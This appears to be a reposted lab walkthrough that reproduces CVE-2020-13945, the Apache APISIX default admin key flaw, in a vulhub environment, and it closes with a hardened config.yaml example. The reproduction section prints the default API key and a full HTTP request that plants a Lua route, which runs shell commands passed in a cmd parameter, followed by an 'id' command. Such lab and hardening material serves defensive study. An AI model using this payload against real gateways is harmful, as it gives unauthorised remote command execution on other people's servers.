Apache APISIX Default Admin Key Vulnerability (CVE-2020-13945) Reproduction
I. Lab environment
1. Ubuntu
2. vulhub
3. apisix/CVE-2020-13945
II. Vulnerability description
Apache APISIX is a high-performance API gateway. If the operator does not set an administrator Token, or deploys with the default configuration file, Apache APISIX uses the default administrator Token edd1c9f034335f136f87ad84b625c8f1. Anyone who knows this Token can reach the Admin API and then use the script parameter of a route to insert arbitrary Lua code, which the gateway executes.
III. Reproduction
(1) Enter vulhub, select the apisix/CVE-2020-13945 environment, and start it with: docker-compose up -d

(2) Once the environment is up, visiting http://your-ip:9080 shows the default 404 page.

(3) Capture a request with Burp Suite and, using the default Token, add a malicious route whose script field contains a malicious Lua script:
POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406

{
  "uri": "/attack",
  "script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
  "upstream": {
    "type": "roundrobin",
    "nodes": {
      "example.com:80": 1
    }
  }
}

(4) Then, visiting the route just added runs arbitrary commands through the cmd parameter: http://your-ip:9080/attack?cmd=id
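As an added defensive example (not part of the original post or of the vulhub environment), here is the kind of config.yaml that leaves the Admin API open with the well-known key, beside a hardened version; the APISIX 2.x config layout is assumed, and the key value and management CIDR are placeholders:

```yaml
# Vulnerable: the shipped default key is kept, and allow_admin is absent
# (assumption: with no allow_admin list, APISIX accepts Admin API calls
# from any source address)
apisix:
  enable_admin: true
  admin_key:
    - name: "admin"
      key: edd1c9f034335f136f87ad84b625c8f1   # default key, same as on this page
      role: admin
---
# Hardened: per-deployment random key, Admin API reachable only from
# a management network, read-only role for tooling that needs no writes
apisix:
  enable_admin: true
  allow_admin:
    - 127.0.0.0/24
    - 10.20.0.0/16                            # placeholder management CIDR
  admin_key:
    - name: "admin"
      key: "<random-hex-key>"                  # placeholder, e.g. openssl rand -hex 16
      role: admin
    - name: "ci-reader"
      key: "<second-random-hex-key>"           # placeholder, separate key per consumer
      role: viewer
```

Rotating the key is not enough on its own if the Admin API port stays reachable from untrusted networks, so the allow_admin restriction (or equivalent network policy) matters as much as the key itself.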

References:
- https://github.com/vulhub/vulhub/blob/master/apisix/CVE-2020-13945
- https://apisix.apache.org/docs/apisix/getting-started
- https://github.com/apache/apisix/pull/2244
- https://seclists.org/oss-sec/2020/q4/187
Please credit the source when reposting. Original link: https://www.uj5u.com/qiye/498784.html
Tags: Information Security
